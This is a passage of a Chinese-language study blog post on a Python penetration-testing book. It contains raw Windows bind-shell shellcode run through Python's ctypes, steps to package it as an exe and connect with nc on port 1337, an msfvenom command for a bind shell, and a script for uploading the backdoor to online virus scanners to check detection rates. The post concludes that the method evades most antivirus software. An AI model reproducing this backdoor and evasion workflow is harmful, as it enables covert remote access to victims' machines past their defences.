"\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c"
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0"
"\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5"
"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb"
"\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5");
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
接着将该py文件转换成Windows的可执行文件exe,具体的操作可以看《关于本地提权的学习笔记(二):注入进程和利用漏洞提权》。
运行该exe文件并查看端口:
可以看到确实已经在运行监听了。
接着在Kali中直接nc连接目标主机的1337端口即可:
这里在国内正常是访问不了书上的vscan.novirusthanks.org的,但是下面的验证脚本可以借鉴一下:
#!/usr/bin/python
#coding=utf-8
import re
import httplib
import time
import os
import optparse
from urlparse import urlparse
def printResults(url):
status = 200
host = urlparse(url)[1]
path = urlparse(url)[2]
if 'analysis' not in path:
while status != 302:
conn = httplib.HTTPConnection(host)
conn.request('GET', path)
resp = conn.getresponse()
status = resp.status
print '[+] Scanning file...'
conn.close()
time.sleep(15)
print '[+] Scan Complete.'
path = path.replace('file', 'analysis')
conn = httplib.HTTPConnection(host)
conn.request('GET', path)
resp = conn.getresponse()
data = resp.read()
conn.close()
reResults = re.findall(r'Detection rate:.*\)', data)
htmlStripRes = reResults[1].replace('', '').replace('', '')
print '[+] ' + str(htmlStripRes)
def uploadFile(fileName):
print "[+] Uploading file to NoVirusThanks..."
fileContents = open(fileName,'rb').read()
header = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U'}
params = "------WebKitFormBoundaryF17rwCZdGuPNPT9U"
params += "\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"" + str(fileName) + "\""
params += "\r\nContent-Type: application/octet stream\r\n\r\n"
params += fileContents
params += "\r\n------WebKitFormBoundaryF17rwCZdGuPNPT9U"
params += "\r\nContent-Disposition: form-data; name=\"submitfile\"\r\n"
params += "\r\nSubmit File\r\n"
params += "------WebKitFormBoundaryF17rwCZdGuPNPT9U--\r\n"
conn = httplib.HTTPConnection('vscan.novirusthanks.org')
conn.request("POST", "/", params, header)
response = conn.getresponse()
location = response.getheader('location')
conn.close()
return location
def main():
parser = optparse.OptionParser('[*]Usage: python virusCheck.py -f ')
parser.add_option('-f', dest='fileName', type='string', help='specify filename')
(options, args) = parser.parse_args()
fileName = options.fileName
if fileName == None:
print parser.usage
exit(0)
elif os.path.isfile(fileName) == False:
print '[+] ' + fileName + ' does not exist.'
exit(0)
else:
loc = uploadFile(fileName)
printResults(loc)
if __name__ == '__main__':
main()
可以根据国内的一些在线扫描查杀平台来改写该脚本,本质就是写一个实现上传功能的爬虫而已。
换一个国内的Virscan在线扫描来进行免杀验证:http://www.virscan.org/
2/39,5.1%的查杀率。
Jotti在线恶意软件扫描:https://virusscan.jotti.org/
1/18,5.5%的查杀率。
对比一下直接使用Metasploit生成的exe文件的免杀效果:
msfvenom -p windows/shell_bind_tcp LPORT=1337 -f exe -o bindshell2.exe
15/39,38.4%的查杀率。
通过对比发现,本章节的方法实现的后门的免杀效果还是很强的。
简单概述来说,就是通过msf生成的后门,第一种可以直接生成exe文件、但是很容易被查杀掉;第二种就是生成c文件,然后通过Python的ctypes库来执行该C语言的payload,接着再将该py文件转换成exe文件,通过几次文件类型的转换,可以有效地避过大多数杀毒软件的查杀。
本篇文章就大致如此了,简单地说一下感受吧,涉及Python安全的面比较广,有一些姿势值得学习借鉴,也学到了一些不常用的Python库是如何进行渗透利用的,重要的还是学了许多安全的思路。当然第五章无线安全部分限于环境条件以及实用性等因素的原因并没有写完,其他一些书上有问题的部分都对代码作了修改实现了相应的功能(Twitter那几小节和Google API的差不多就没有累赘了),若以后有时间再补充吧。最后,最重要的是要学会举一反三,懂得将书上的代码进行修改甚至完全重写,写出专属自己的渗透测试工具。